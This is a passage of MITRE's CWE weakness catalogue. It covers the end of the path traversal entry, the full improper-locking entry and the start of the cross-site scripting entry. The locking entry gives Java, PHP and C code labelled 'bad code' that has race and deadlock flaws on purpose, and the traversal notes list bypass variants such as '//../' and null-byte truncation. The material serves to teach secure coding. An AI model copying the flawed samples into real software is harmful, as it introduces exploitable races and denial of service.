MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	635	Weaknesses Originally Used by NVD from 2008 to 2016
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	715	OWASP Top Ten 2007 Category A4 - Insecure Direct Object Reference
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	723	OWASP Top Ten 2004 Category A2 - Broken Access Control
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	743	CERT C Secure Coding Standard (2008) Chapter 10 - Input Output (FIO)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	802	2010 Top 25 - Risky Resource Management
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	813	OWASP Top Ten 2010 Category A4 - Insecure Direct Object References
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	865	2011 Top 25 - Risky Resource Management
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	877	CERT C++ Secure Coding Section 09 - Input Output (FIO)
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	884	CWE Cross-section
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	932	OWASP Top Ten 2013 Category A4 - Insecure Direct Object References
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	981	SFP Secondary Cluster: Path Traversal
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1031	OWASP Top Ten 2017 Category A5 - Broken Access Control
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1131	CISQ Quality Measures (2016) - Security
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1179	SEI CERT Perl Coding Standard - Guidelines 01. Input Validation and Data Sanitization (IDS)
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1200	Weaknesses in the 2019 CWE Top 25 Most Dangerous Software Errors
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1308	CISQ Quality Measures - Security
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1337	Weaknesses in the 2021 CWE Top 25 Most Dangerous Software Weaknesses
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1340	CISQ Data Protection Measures
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1345	OWASP Top Ten 2021 Category A01:2021 - Broken Access Control
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1350	Weaknesses in the 2020 CWE Top 25 Most Dangerous Software Weaknesses
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1387	Weaknesses in the 2022 CWE Top 25 Most Dangerous Software Weaknesses
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1404	Comprehensive Categorization: File Handling
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1425	Weaknesses in the 2023 CWE Top 25 Most Dangerous Software Weaknesses
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1430	Weaknesses in the 2024 CWE Top 25 Most Dangerous Software Weaknesses
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1435	Weaknesses in the 2025 CWE Top 25 Most Dangerous Software Weaknesses
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1436	OWASP Top Ten 2025 Category A01:2025 - Broken Access Control

Vulnerability Mapping Notes

Usage

ALLOWED-WITH-REVIEW

(this CWE ID could be used to map to real-world vulnerabilities in limited situations requiring careful review)

Reason

Abstraction

Rationale

This CWE entry might have children that would be more appropriate.

Comments

Examine children of this entry to see if there is a better fit. Consider children such as CWE-23 (or its descendants) for relative path traversal, or CWE-36 for absolute path traversal.

Suggestions

CWE-ID	Comment
CWE-23	relative path traversal - also consider descendants
CWE-36	absolute path traversal

Notes

Relationship

Pathname equivalence can be regarded as a type of canonicalization error.

Relationship

Some pathname equivalence issues are not directly related to directory traversal, rather are used to bypass security-relevant checks for whether a file/directory can be accessed by the attacker (e.g. a trailing "/" on a filename could bypass access rules that don't expect a trailing /, causing a server to provide the file when it normally would not).

Terminology

Like other weaknesses, terminology is often based on the types of manipulations used, instead of the underlying weaknesses. Some people use "directory traversal" only to refer to the injection of ".." and equivalent sequences whose specific meaning is to traverse directories.

Other variants like "absolute pathname" and "drive letter" have the *effect* of directory traversal, but some people may not call it such, since it doesn't involve ".." or equivalent.

Research Gap

Many variants of path traversal attacks are probably under-studied with respect to root cause. CWE-790 and CWE-182 begin to cover part of this gap.

Research Gap

Incomplete diagnosis or reporting of vulnerabilities can make it difficult to know which variant is affected. For example, a researcher might say that "..\" is vulnerable, but not test "../" which may also be vulnerable.

Any combination of directory separators ("/", "\", etc.) and numbers of "." (e.g. "....") can produce unique variants; for example, the "//../" variant is not listed (CVE-2004-0325). See this entry's children and lower-level descendants.

Other

In many programming languages, the injection of a null byte (the 0 or NUL) may allow an attacker to truncate a generated filename to apply to a wider range of files. For example, the product may add ".txt" to any pathname, thus limiting the attacker to text files, but a null injection may effectively remove this restriction.

Taxonomy Mappings

Mapped Taxonomy Name	Node ID	Fit	Mapped Node Name
PLOVER			Path Traversal
OWASP Top Ten 2007	A4	CWE More Specific	Insecure Direct Object Reference
OWASP Top Ten 2004	A2	CWE More Specific	Broken Access Control
CERT C Secure Coding	FIO02-C		Canonicalize path names originating from untrusted sources
SEI CERT Perl Coding Standard	IDS00-PL	Exact	Canonicalize path names before validating them
WASC	33		Path Traversal
Software Fault Patterns	SFP16		Path Traversal
OMG ASCSM	ASCSM-CWE-22

Related Attack Patterns

CAPEC-ID	Attack Pattern Name
CAPEC-126	Path Traversal
CAPEC-64	Using Slashes and URL Encoding Combined to Bypass Validation Logic
CAPEC-76	Manipulating Web Input to File System Calls
CAPEC-78	Using Escaped Slashes in Alternate Encoding
CAPEC-79	Using Slashes in Alternate Encoding

References

[REF-7]	Michael Howard and David LeBlanc. "Writing Secure Code". Chapter 11, "Directory Traversal and Using Parent Paths (..)" Page 370. 2nd Edition. Microsoft Press. 2002-12-04. <https://www.microsoftpressstore.com/store/writing-secure-code-9780735617223>.
[REF-45]	OWASP. "OWASP Enterprise Security API (ESAPI) Project". <https://owasp.org/www-project-enterprise-security-api/>. (URL validated: 2025-07-24)
[REF-185]	OWASP. "Testing for Path Traversal (OWASP-AZ-001)". <http://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001)>.
[REF-186]	Johannes Ullrich. "Top 25 Series - Rank 7 - Path Traversal". SANS Software Security Institute. 2010-03-09. <https://www.sans.org/blog/top-25-series-rank-7-path-traversal/>. (URL validated: 2023-04-07)
[REF-76]	Sean Barnum and Michael Gegick. "Least Privilege". 2005-09-14. <https://web.archive.org/web/20211209014121/https://www.cisa.gov/uscert/bsi/articles/knowledge/principles/least-privilege>. (URL validated: 2023-04-07)
[REF-62]	Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 9, "Filenames and Paths", Page 503. 1st Edition. Addison Wesley. 2006.
[REF-962]	Object Management Group (OMG). "Automated Source Code Security Measure (ASCSM)". ASCSM-CWE-22. 2016-01. <http://www.omg.org/spec/ASCSM/1.0/>.
[REF-1448]	Cybersecurity and Infrastructure Security Agency. "Secure by Design Alert: Eliminating Directory Traversal Vulnerabilities in Software". 2024-05-02. <https://www.cisa.gov/resources-tools/resources/secure-design-alert-eliminating-directory-traversal-vulnerabilities-software>. (URL validated: 2024-07-14)
[REF-1479]	Gregory Larsen, E. Kenneth Hong Fong, David A. Wheeler and Rama S. Moorthy. "State-of-the-Art Resources (SOAR) for Software Vulnerability Detection, Test, and Evaluation". 2014-07. <https://www.ida.org/-/media/feature/publications/s/st/stateoftheart-resources-soar-for-software-vulnerability-detection-test-and-evaluation/p-5061.ashx>. (URL validated: 2025-09-05)
[REF-1481]	D3FEND. "D3FEND: Application Layer Firewall". <https://d3fend.mitre.org/dao/artifact/d3f:ApplicationLayerFirewall/>. (URL validated: 2025-09-06)
[REF-1482]	D3FEND. "D3FEND: D3-TL Trusted Library". <https://d3fend.mitre.org/technique/d3f:TrustedLibrary/>. (URL validated: 2025-09-06)

Content History

Submissions
Submission Date	Submitter	Organization
2006-07-19 (CWE Draft 3, 2006-07-19)	PLOVER
2006-07-19 (CWE Draft 3, 2006-07-19)
Contributions
Contribution Date	Contributor	Organization
2022-07-11	Nick Johnston
2022-07-11	Identified weakness in Perl demonstrative example
2024-02-29 (CWE 4.15, 2024-07-16)	Abhi Balakrishnan
2024-02-29 (CWE 4.15, 2024-07-16)	Provided diagram to improve CWE usability
2024-11-01	Drew Buttner	MITRE
2024-11-01	Identified weakness in "good code" for Python demonstrative example
Modifications
Modification Date	Modifier	Organization
2025-12-11 (CWE 4.19, 2025-12-11)	CWE Content Team	MITRE
2025-12-11 (CWE 4.19, 2025-12-11)	updated Mapping_Notes, Relationships
2025-09-09 (CWE 4.18, 2025-09-09)	CWE Content Team	MITRE
2025-09-09 (CWE 4.18, 2025-09-09)	updated Applicable_Platforms, Detection_Factors, Observed_Examples, Potential_Mitigations, References
2025-04-03 (CWE 4.17, 2025-04-03)	CWE Content Team	MITRE
2025-04-03 (CWE 4.17, 2025-04-03)	updated Relationships
2024-11-19 (CWE 4.16, 2024-11-19)	CWE Content Team	MITRE
2024-11-19 (CWE 4.16, 2024-11-19)	updated Demonstrative_Examples, Relationships
2024-07-16 (CWE 4.15, 2024-07-16)	CWE Content Team	MITRE
2024-07-16 (CWE 4.15, 2024-07-16)	updated Common_Consequences, Description, Diagram, Observed_Examples, Other_Notes, References
2023-10-26	CWE Content Team	MITRE
2023-10-26	updated Observed_Examples
2023-06-29	CWE Content Team	MITRE
2023-06-29	updated Mapping_Notes, Relationships
2023-04-27	CWE Content Team	MITRE
2023-04-27	updated Demonstrative_Examples, References, Relationships, Time_of_Introduction
2023-01-31	CWE Content Team	MITRE
2023-01-31	updated Common_Consequences, Description, Detection_Factors
2022-10-13	CWE Content Team	MITRE
2022-10-13	updated Observed_Examples, References
2022-06-28	CWE Content Team	MITRE
2022-06-28	updated Observed_Examples, Relationships
2021-10-28	CWE Content Team	MITRE
2021-10-28	updated Observed_Examples, Relationships
2021-07-20	CWE Content Team	MITRE
2021-07-20	updated Relationships
2021-03-15	CWE Content Team	MITRE
2021-03-15	updated Demonstrative_Examples, Relationships
2020-12-10	CWE Content Team	MITRE
2020-12-10	updated Potential_Mitigations, Relationships
2020-08-20	CWE Content Team	MITRE
2020-08-20	updated Relationships
2020-06-25	CWE Content Team	MITRE
2020-06-25	updated Demonstrative_Examples, Potential_Mitigations
2020-02-24	CWE Content Team	MITRE
2020-02-24	updated Potential_Mitigations, Relationships
2019-09-19	CWE Content Team	MITRE
2019-09-19	updated Relationships
2019-06-20	CWE Content Team	MITRE
2019-06-20	updated Related_Attack_Patterns, Relationships, Type
2019-01-03	CWE Content Team	MITRE
2019-01-03	updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings
2018-03-27	CWE Content Team	MITRE
2018-03-27	updated References, Relationships
2017-11-08	CWE Content Team	MITRE
2017-11-08	updated Affected_Resources, Causal_Nature, Likelihood_of_Exploit, References, Relationships, Relevant_Properties, Taxonomy_Mappings
2017-05-03	CWE Content Team	MITRE
2017-05-03	updated Demonstrative_Examples
2017-01-19	CWE Content Team	MITRE
2017-01-19	updated Related_Attack_Patterns
2015-12-07	CWE Content Team	MITRE
2015-12-07	updated Relationships
2014-07-30	CWE Content Team	MITRE
2014-07-30	updated Detection_Factors, Relationships, Taxonomy_Mappings
2014-06-23	CWE Content Team	MITRE
2014-06-23	updated Other_Notes, Research_Gaps
2013-07-17	CWE Content Team	MITRE
2013-07-17	updated Related_Attack_Patterns, Relationships
2013-02-21	CWE Content Team	MITRE
2013-02-21	updated Observed_Examples
2012-10-30	CWE Content Team	MITRE
2012-10-30	updated Potential_Mitigations
2012-05-11	CWE Content Team	MITRE
2012-05-11	updated Demonstrative_Examples, References, Relationships
2011-09-13	CWE Content Team	MITRE
2011-09-13	updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings
2011-06-27	CWE Content Team	MITRE
2011-06-27	updated Relationships
2011-03-29	CWE Content Team	MITRE
2011-03-29	updated Potential_Mitigations
2010-12-13	CWE Content Team	MITRE
2010-12-13	updated Potential_Mitigations
2010-09-27	CWE Content Team	MITRE
2010-09-27	updated Potential_Mitigations
2010-06-21	CWE Content Team	MITRE
2010-06-21	updated Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Potential_Mitigations, References, Relationships
2010-02-16	CWE Content Team	MITRE
2010-02-16	updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Related_Attack_Patterns, Relationship_Notes, Relationships, Research_Gaps, Taxonomy_Mappings, Terminology_Notes, Time_of_Introduction, Weakness_Ordinalities
2009-07-27	CWE Content Team	MITRE
2009-07-27	updated Potential_Mitigations
2008-11-24	CWE Content Team	MITRE
2008-11-24	updated Relationships, Taxonomy_Mappings
2008-10-14	CWE Content Team	MITRE
2008-10-14	updated Description
2008-09-08	CWE Content Team	MITRE
2008-09-08	updated Alternate_Terms, Relationships, Other_Notes, Relationship_Notes, Relevant_Properties, Taxonomy_Mappings, Weakness_Ordinalities
2008-08-15		Veracode
2008-08-15	Suggested OWASP Top Ten 2004 mapping
2008-07-01	Eric Dalci	Cigital
2008-07-01	updated Potential_Mitigations, Time_of_Introduction
Previous Entry Names
Change Date	Previous Entry Name
2010-02-16	Path Traversal

Weakness ID: 667

Vulnerability Mapping: ALLOWED This CWE ID could be used to map to real-world vulnerabilities in limited situations requiring careful review (with careful review of mapping notes)
Abstraction: Class Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.

View customized information:

Description

The product does not properly acquire or release a lock on a resource, leading to unexpected resource state changes and behaviors.

Extended Description

Locking is a type of synchronization behavior that ensures that multiple independently-operating processes or threads do not interfere with each other when accessing the same resource. All processes/threads are expected to follow the same steps for locking. If these steps are not followed precisely - or if no locking is done at all - then another process/thread could modify the shared resource in a way that is not visible or predictable to the original process. This can lead to data or memory corruption, denial of service, etc.

Common Consequences

Impact	Details
DoS: Resource Consumption (CPU)	Scope: Availability Inconsistent locking discipline can lead to deadlock.

Potential Mitigations

Phase(s)	Mitigation
Implementation	Strategy: Libraries or Frameworks Use industry standard APIs to implement locking mechanism.

Relationships

Relevant to the view "Research Concepts" (View-1000)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	662	Improper Synchronization
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	412	Unrestricted Externally Accessible Lock
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	413	Improper Resource Locking
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	414	Missing Lock Check
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	609	Double-Checked Locking
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	764	Multiple Locks of a Critical Resource
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	765	Multiple Unlocks of a Critical Resource
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	832	Unlock of a Resource that is not Locked
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	833	Deadlock
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	1232	Improper Lock Behavior After Power State Transition
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	1233	Security-Sensitive Hardware Controls with Missing Lock Bit Protection
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	1234	Hardware Internal or Debug Modes Allow Override of Locks

Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	662	Improper Synchronization

Relevant to the view "CISQ Quality Measures (2020)" (View-1305)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	662	Improper Synchronization

Relevant to the view "CISQ Data Protection Measures" (View-1340)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	662	Improper Synchronization

Modes Of Introduction

Phase	Note
Architecture and Design
Implementation

Applicable Platforms

Languages	Class: Not Language-Specific (Undetermined Prevalence)
Technologies	Class: Not Technology-Specific (Undetermined Prevalence)

Demonstrative Examples

Example 1

In the following Java snippet, methods are defined to get and set a long field in an instance of a class that is shared across multiple threads. Because operations on double and long are nonatomic in Java, concurrent access may cause unexpected behavior. Thus, all operations on long and double fields should be synchronized.

(bad code)

Example Language: Java

private long someLongValue;
public long getLongValue() {

return someLongValue;

}

public void setLongValue(long l) {

someLongValue = l;

}

Example 2

This code tries to obtain a lock for a file, then writes to it.

(bad code)

Example Language: PHP

function writeToLog($message){

$logfile = fopen("logFile.log", "a");
//attempt to get logfile lock
if (flock($logfile, LOCK_EX)) {

fwrite($logfile,$message);
// unlock logfile
flock($logfile, LOCK_UN);

}
else {

print "Could not obtain lock on logFile.log, message not recorded\n";

}

}
fclose($logFile);

PHP by default will wait indefinitely until a file lock is released. If an attacker is able to obtain the file lock, this code will pause execution, possibly leading to denial of service for other users. Note that in this case, if an attacker can perform an flock() on the file, they may already have privileges to destroy the log file. However, this still impacts the execution of other programs that depend on flock().

Example 3

The following function attempts to acquire a lock in order to perform operations on a shared resource.

(bad code)

Example Language: C

void f(pthread_mutex_t *mutex) {

pthread_mutex_lock(mutex);

/* access shared resource */

pthread_mutex_unlock(mutex);

}

However, the code does not check the value returned by pthread_mutex_lock() for errors. If pthread_mutex_lock() cannot acquire the mutex for any reason, the function may introduce a race condition into the program and result in undefined behavior.

In order to avoid data races, correctly written programs must check the result of thread synchronization functions and appropriately handle all errors, either by attempting to recover from them or reporting them to higher levels.

(good code)

Example Language: C

int f(pthread_mutex_t *mutex) {

int result;

result = pthread_mutex_lock(mutex);
if (0 != result)

return result;

/* access shared resource */

return pthread_mutex_unlock(mutex);

}

Example 4

It may seem that the following bit of code achieves thread safety while avoiding unnecessary synchronization...

(bad code)

Example Language: Java

if (helper == null) {

synchronized (this) {

if (helper == null) {

helper = new Helper();

}

}
return helper;

The programmer wants to guarantee that only one Helper() object is ever allocated, but does not want to pay the cost of synchronization every time this code is called.

Suppose that helper is not initialized. Then, thread A sees that helper==null and enters the synchronized block and begins to execute:

(bad code)

Example Language: Java

helper = new Helper();

If a second thread, thread B, takes over in the middle of this call and helper has not finished running the constructor, then thread B may make calls on helper while its fields hold incorrect values.

Selected Observed Examples

Reference	Description
CVE-2021-1782	Chain: improper locking (CWE-667) leads to race condition (CWE-362), as exploited in the wild per CISA KEV.
CVE-2009-0935	Attacker provides invalid address to a memory-reading function, causing a mutex to be unlocked twice
CVE-2010-4210	function in OS kernel unlocks a mutex that was not previously locked, causing a panic or overwrite of arbitrary memory.
CVE-2008-4302	Chain: OS kernel does not properly handle a failure of a function call (CWE-755), leading to an unlock of a resource that was not locked (CWE-832), with resultant crash.
CVE-2009-1243	OS kernel performs an unlock in some incorrect circumstances, leading to panic.
CVE-2009-2857	OS deadlock
CVE-2009-1961	OS deadlock involving 3 separate functions
CVE-2009-2699	deadlock in library
CVE-2009-4272	deadlock triggered by packets that force collisions in a routing table
CVE-2002-1850	read/write deadlock between web server and script
CVE-2004-0174	web server deadlock involving multiple listening connections
CVE-2009-1388	multiple simultaneous calls to the same function trigger deadlock.
CVE-2006-5158	chain: other weakness leads to NULL pointer dereference (CWE-476) or deadlock (CWE-833).
CVE-2006-4342	deadlock when an operation is performed on a resource while it is being removed.
CVE-2006-2374	Deadlock in device driver triggered by using file handle of a related device.
CVE-2006-2275	Deadlock when large number of small messages cannot be processed quickly enough.
CVE-2005-3847	OS kernel has deadlock triggered by a signal during a core dump.
CVE-2005-3106	Race condition leads to deadlock.
CVE-2005-2456	Chain: array index error (CWE-129) leads to deadlock (CWE-833)
CVE-2001-0682	Program can not execute when attacker obtains a mutex.
CVE-2002-1914	Program can not execute when attacker obtains a lock on a critical output file.
CVE-2002-1915	Program can not execute when attacker obtains a lock on a critical output file.
CVE-2002-0051	Critical file can be opened with exclusive read access by user, preventing application of security policy. Possibly related to improper permissions, large-window race condition.
CVE-2000-0338	Chain: predictable file names used for locking, allowing attacker to create the lock beforehand. Resultant from permissions and randomness.
CVE-2000-1198	Chain: Lock files with predictable names. Resultant from randomness.
CVE-2002-1869	Product does not check if it can write to a log file, allowing attackers to avoid logging by accessing the file using an exclusive lock. Overlaps unchecked error condition. This is not quite CWE-412, but close.

Weakness Ordinalities

Ordinality	Description
Primary	(where the weakness exists independent of other weaknesses)

Detection Methods

Method

Details

Automated Static Analysis

Effectiveness: High

Memberships

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	748	CERT C Secure Coding Standard (2008) Appendix - POSIX (POS)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	852	The CERT Oracle Secure Coding Standard for Java (2011) Chapter 9 - Visibility and Atomicity (VNA)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	853	The CERT Oracle Secure Coding Standard for Java (2011) Chapter 10 - Locking (LCK)
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	884	CWE Cross-section
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	986	SFP Secondary Cluster: Missing Lock
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1131	CISQ Quality Measures (2016) - Security
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1142	SEI CERT Oracle Secure Coding Standard for Java - Guidelines 08. Visibility and Atomicity (VNA)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1143	SEI CERT Oracle Secure Coding Standard for Java - Guidelines 09. Locking (LCK)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1169	SEI CERT C Coding Standard - Guidelines 14. Concurrency (CON)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1171	SEI CERT C Coding Standard - Guidelines 50. POSIX (POS)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1401	Comprehensive Categorization: Concurrency

Vulnerability Mapping Notes

Usage	ALLOWED-WITH-REVIEW (this CWE ID could be used to map to real-world vulnerabilities in limited situations requiring careful review)
Reason	Abstraction
Rationale	This CWE entry is a Class and might have Base-level children that would be more appropriate
Comments	Examine children of this entry to see if there is a better fit

Notes

Maintenance

Deeper research is necessary for synchronization and related mechanisms, including locks, mutexes, semaphores, and other mechanisms. Multiple entries are dependent on this research, which includes relationships to concurrency, race conditions, reentrant functions, etc. CWE-662 and its children - including CWE-667, CWE-820, CWE-821, and others - may need to be modified significantly, along with their relationships.

Taxonomy Mappings

Mapped Taxonomy Name	Node ID	Fit	Mapped Node Name
CERT C Secure Coding	CON31-C	CWE More Abstract	Do not destroy a mutex while it is locked
CERT C Secure Coding	POS48-C	CWE More Abstract	Do not unlock or destroy another POSIX thread's mutex
The CERT Oracle Secure Coding Standard for Java (2011)	VNA00-J		Ensure visibility when accessing shared primitive variables
The CERT Oracle Secure Coding Standard for Java (2011)	VNA02-J		Ensure that compound operations on shared variables are atomic
The CERT Oracle Secure Coding Standard for Java (2011)	VNA05-J		Ensure atomicity when reading and writing 64-bit values
The CERT Oracle Secure Coding Standard for Java (2011)	LCK06-J		Do not use an instance lock to protect shared static data
Software Fault Patterns	SFP19		Missing Lock
OMG ASCSM	ASCSM-CWE-667

Related Attack Patterns

CAPEC-ID	Attack Pattern Name
CAPEC-25	Forced Deadlock
CAPEC-26	Leveraging Race Conditions
CAPEC-27	Leveraging Race Conditions via Symbolic Links

References

[REF-962]

Object Management Group (OMG). "Automated Source Code Security Measure (ASCSM)". ASCSM-CWE-667. 2016-01.
<http://www.omg.org/spec/ASCSM/1.0/>.

Content History

Submissions
Submission Date	Submitter	Organization
2008-04-11 (CWE Draft 9, 2008-04-11)	CWE Content Team	MITRE
2008-04-11 (CWE Draft 9, 2008-04-11)
Modifications
Modification Date	Modifier	Organization
2025-12-11 (CWE 4.19, 2025-12-11)	CWE Content Team	MITRE
2025-12-11 (CWE 4.19, 2025-12-11)	updated Applicable_Platforms, Weakness_Ordinalities
2025-04-03 (CWE 4.17, 2025-04-03)	CWE Content Team	MITRE
2025-04-03 (CWE 4.17, 2025-04-03)	updated Demonstrative_Examples
2023-06-29	CWE Content Team	MITRE
2023-06-29	updated Mapping_Notes
2023-04-27	CWE Content Team	MITRE
2023-04-27	updated Detection_Factors, Relationships
2023-01-31	CWE Content Team	MITRE
2023-01-31	updated Description
2022-06-28	CWE Content Team	MITRE
2022-06-28	updated Observed_Examples
2021-03-15	CWE Content Team	MITRE
2021-03-15	updated Demonstrative_Examples
2020-12-10	CWE Content Team	MITRE
2020-12-10	updated Relationships
2020-08-20	CWE Content Team	MITRE
2020-08-20	updated Relationships
2020-02-24	CWE Content Team	MITRE
2020-02-24	updated Relationships, Type
2019-09-23	CWE Content Team	MITRE
2019-09-23	updated Description, Maintenance_Notes, Relationships
2019-09-19	CWE Content Team	MITRE
2019-09-19	updated Relationships
2019-01-03	CWE Content Team	MITRE
2019-01-03	updated References, Relationships, Taxonomy_Mappings
2017-11-08	CWE Content Team	MITRE
2017-11-08	updated Taxonomy_Mappings
2017-05-03	CWE Content Team	MITRE
2017-05-03	updated Related_Attack_Patterns
2014-07-30	CWE Content Team	MITRE
2014-07-30	updated Relationships, Taxonomy_Mappings
2012-10-30	CWE Content Team	MITRE
2012-10-30	updated Potential_Mitigations
2012-05-11	CWE Content Team	MITRE
2012-05-11	updated Demonstrative_Examples, Observed_Examples, Relationships
2011-06-01	CWE Content Team	MITRE
2011-06-01	updated Common_Consequences, Relationships, Taxonomy_Mappings
2010-12-13	CWE Content Team	MITRE
2010-12-13	updated Description, Name, Relationships
2010-09-27	CWE Content Team	MITRE
2010-09-27	updated Relationships
2009-07-27	CWE Content Team	MITRE
2009-07-27	updated Common_Consequences
2009-05-27	CWE Content Team	MITRE
2009-05-27	updated Relationships
2009-03-10	CWE Content Team	MITRE
2009-03-10	updated Related_Attack_Patterns
2008-11-24	CWE Content Team	MITRE
2008-11-24	updated Relationships, Taxonomy_Mappings
2008-09-08	CWE Content Team	MITRE
2008-09-08	updated Relationships
2008-07-01	Eric Dalci	Cigital
2008-07-01	updated Potential_Mitigations, Time_of_Introduction
2008-07-01	Sean Eidemiller	Cigital
2008-07-01	added/updated demonstrative examples
Previous Entry Names
Change Date	Previous Entry Name
2010-12-13	Insufficient Locking

Weakness ID: 79

View customized information:

Description

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Extended Description

There are many variants of cross-site scripting, characterized by a variety of terms or involving different attack topologies. However, they all indicate the same fundamental weakness: improper neutralization of dangerous input between the adversary and a victim.

Alternate Terms

XSS	A common abbreviation for Cross-Site Scripting.
